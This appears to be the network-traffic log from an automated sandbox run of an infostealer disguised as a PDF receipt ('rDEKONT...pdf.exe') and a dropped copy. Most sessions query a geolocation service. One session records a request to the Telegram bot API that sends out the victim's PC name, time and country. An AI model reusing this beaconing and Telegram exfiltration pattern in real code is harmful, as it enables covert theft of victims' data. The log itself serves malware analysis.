                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1643&rtt_var=632&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1709601&cwnd=241&unsent_bytes=0&cid=65ee8bd45c0d7cab&ts=148&x=0"
2025-01-16 06:02:04 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:06 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
2025-01-16 06:02:06 UTC | 863 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:06 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322115
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTqNjisUtllJkP%2B5e8wGRTMSjLiclmK0J5VVfjocc2%2BE9RPmBSieXc13k%2FV4HY0BWqEtq4bAmH%2BT9YdVRtUQ0%2B21l5mqpZ3UtVWsKuj%2FMDJXYHH07YoqdN%2Bia4fXNzOmnEKImTjO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be50cdd8a7c6a-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1944&min_rtt=1940&rtt_var=736&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1478481&cwnd=218&unsent_bytes=0&cid=78371a0ed5427dd8&ts=157&x=0"
2025-01-16 06:02:06 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49742 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:07 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:07 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:07 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322116
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BSGpW6ZroE4btrHfWaQ%2BcX5YFJhiSoBIldBjvTwi7BYK2gwe7tQOg0zWXrfQYG5U9mJItP1wqVAcCnH9NEvx0sQdWKIS9SxR96YBgTXAj9LN8n2yShC55qpwiOZ74OBYC8U%2FIFxW"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be515393042e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1714&min_rtt=1712&rtt_var=647&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1685912&cwnd=241&unsent_bytes=0&cid=c09254df3650b6f6&ts=147&x=0"
2025-01-16 06:02:07 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49743 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:07 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
2025-01-16 06:02:08 UTC | 861 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:07 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PWXImCr56WVZ3M0vDk%2FqQaydHE52BRxombiVpWIM%2F26AxXOj3DNWcjO9Fzpq6sR5EoiudCR7mssgDMU39CWLQnOw%2FUzit5t1PF7ET%2BjRc7CxzVJqIIDAUa%2BoSLZOqhSiTI%2B1bcb8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be517dfc4de95-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1457&rtt_var=553&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1968981&cwnd=246&unsent_bytes=0&cid=3edb954f7c688e49&ts=171&x=0"
2025-01-16 06:02:08 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49745 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:08 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:08 UTC | 863 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7eHAxy3Y9Mtfg5%2FHmMRGrMNKaJ9jOoZIDh%2BD1%2ByyRgcPDSHhGoA4gZZD1xLg%2Bzn%2FrA8C6UUy5CzcgyMhF1w4%2BW628WqQTWtiIMyIOE6sXUPPzUybxlDb4H4yVxDcfQ8Wr%2FOFGN97"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be51cfdf442e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1613&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1767554&cwnd=241&unsent_bytes=0&cid=7a6c13227862b579&ts=147&x=0"
2025-01-16 06:02:08 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49746 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:08 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
2025-01-16 06:02:08 UTC | 859 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:08 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322117
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYt%2BPozJg0sx42IB5E6cmflwE1VAweWi%2BfdjLyNtbFcmA1dMIBLP2wHe5ryceGgx9dT7%2B8EqxDwKxeam0W85pYNWwMTr5GlQtRniLFY5hWWvsNuP5%2FhUxCgAAk4I1mnmPw1ml%2F3O"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be51d4ed07c6a-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2012&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1429270&cwnd=218&unsent_bytes=0&cid=8180c7f1997afbee&ts=138&x=0"
2025-01-16 06:02:08 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49749 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:10 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:10 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322119
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BacDyaHtl7wHQDngF6XqdN9W8wPU0q7O9LqQMEJRP2i1VXMXYIhbOkMrNnKfYjNgIknY1%2BnnPf94bCOmRrM3ML9VjpjswMAaZIQidn6NexyAH%2FPtEP0BX75Dv2jGYPO8wDzPizIo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5251c604414-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1677&min_rtt=1675&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1722713&cwnd=180&unsent_bytes=0&cid=a4cbabe4e0038693&ts=150&x=0"
2025-01-16 06:02:10 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49750 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:10 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:10 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:10 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322119
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EZpEYzMH9lXyE0XTNH2Vr4UkhRYdi4fVUt1zrCs%2F1hrIUplqTVCtnSVwv1GPdaRBm8hLCfphXtlB%2Fqy%2FlVjZpgDz28ctzEabaLiSlqccv%2F6enQow6RzhL2U1LqoH9LIZLuBnTn2l"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be5255b0542e9-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1685&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1720683&cwnd=241&unsent_bytes=0&cid=bebb911ce314899f&ts=134&x=0"
2025-01-16 06:02:10 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49754 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:11 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                        Connection: Keep-Alive
2025-01-16 06:02:11 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:11 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322120
                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=joI93meXYT0ObFWv4Z2hMc8oCIm84RfhncA67unF%2BCQDR1sWYiHdBBBLAqx51nw1qkQxtWGs6wf7rM4eQfj0y0E%2Fs1HnQLPirFgo3ox8ovFQnH3NozBinHFUOw7tQ1%2BupkQWdQl%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 902be52d79a5c358-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1483&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1818181&cwnd=155&unsent_bytes=0&cid=f7d23684933a8462&ts=137&x=0"
2025-01-16 06:02:11 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49753 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:11 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                        Host: reallyfreegeoip.org
2025-01-16 06:02:11 UTC | 857 | IN | HTTP/1.1 200 OK
                                                                                                                                                        Date: Thu, 16 Jan 2025 06:02:11 GMT
                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                        Content-Length: 362
                                                                                                                                                        Connection: close
                                                                                                                                                        Age: 2322120
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bq%2Fpd5BC0ObscfKh5sVkKdTEldeX4%2FcWElrxYu%2F%2FcfQpkjOFylJEj3VfjJpWUNkbs40oj9dFcQKqDORw9VInQdbx7HgEKkM7t4yziiMfVr3JZlyjv4QxuVEPOOcBaHcMouq52NgX"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be52d990642e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1663&rtt_var=635&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1708601&cwnd=241&unsent_bytes=0&cid=1c767e8ae7b21c9e&ts=143&x=0"
2025-01-16 06:02:11 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49757 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:12 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-16 06:02:12 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 06:02:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2322121
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zc3WZLDXRVsaZ%2Fyzh0dawXYO00r4cmNcVmv%2B5WeKzSI73xc3adnY0UV4m8OY1Fx162A2YWAxwHVdHobISpIsWNkDLZLek%2Fi1B3j99aH7gAhk47hvjySe9qww0%2Bn7%2F6dj6erJTbWW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be535999cde95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1446&min_rtt=1440&rtt_var=553&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1957104&cwnd=246&unsent_bytes=0&cid=a0e91d739a6ec534&ts=132&x=0"
2025-01-16 06:02:12 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49758 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:12 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-16 06:02:12 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 06:02:12 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2322121
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BW%2FjZ38OAlhiF4%2BjQVq1tiykqoic7ynC1zQn36f6APSyKrdxFBH7XYKoeA2eZtSXkBG2w5ktvsjEmbmUnFBjh5dcbuo8b9Q9DhHP19y3cdZvRGWWjub3VfcrZthvsX97oeu%2FuALi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be535adf442e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1732&min_rtt=1722&rtt_var=667&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1615938&cwnd=241&unsent_bytes=0&cid=e5f2d2bbeccc2cc8&ts=146&x=0"
2025-01-16 06:02:12 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49762 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:13 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-16 06:02:14 UTC | 867 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 06:02:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2322123
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAaQTu6Og5c5yKsbeVA%2BC%2B1qR2xbUNjmrdKUDp%2F6j3Pd%2B4elFTEa8tlpsnm%2Fh9OmK82SpUdyGQf%2Fe97WP1KyfotL%2FyX0Eu8rfTKzUDyLw1bsg2%2Bbgdf1YwbilBb%2FtiNgU00k6rgx"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be53daa8842e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1691&rtt_var=656&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1641371&cwnd=241&unsent_bytes=0&cid=102b25766137e6eb&ts=148&x=0"
2025-01-16 06:02:14 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49761 | 104.21.64.1 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:13 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-16 06:02:14 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 06:02:14 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2322123
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjNopCLCQ7B34QK1u%2B0l1FuHIltUvJ6tT0rSoLxDiYmvY4EsNpeehcBFLbihYFcMLp%2BUSZ6xEa%2BQpQQD20ps%2BhEfNxrQCJzVJcq4qkJZBYkxRl1%2FreX0q0JJpVget55dcf6qr4qd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be53daa8942e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1687&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1682027&cwnd=241&unsent_bytes=0&cid=6dc9dc2fa3b30db8&ts=134&x=0"
2025-01-16 06:02:14 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49764 | 149.154.167.220 | 443 | 7656 | C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:14 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-16 06:02:15 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Thu, 16 Jan 2025 06:02:14 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-16 06:02:15 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49765 | 104.21.64.1 | 443 | 8008 | C:\Users\user\AppData\Roaming\teXfNv.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-16 06:02:15 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-16 06:02:15 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Thu, 16 Jan 2025 06:02:15 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2322124
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bu7f4NcVAJkeN9k8XJKBpCuIfKveETh1SB7qoY%2FM351SOxAlR3Jf47RG7d8Qj%2BOvOqjM33nIcsLTpl%2BJhNP0c%2FV%2BfB5iFPcJB2hW1asBn0r4AF1nu5BD6nCViLyAxQAtM0bS1Hci"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 902be545fffb42e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1676&min_rtt=1666&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1666666&cwnd=241&unsent_bytes=0&cid=1dc52bb57a6191fd&ts=144&x=0"
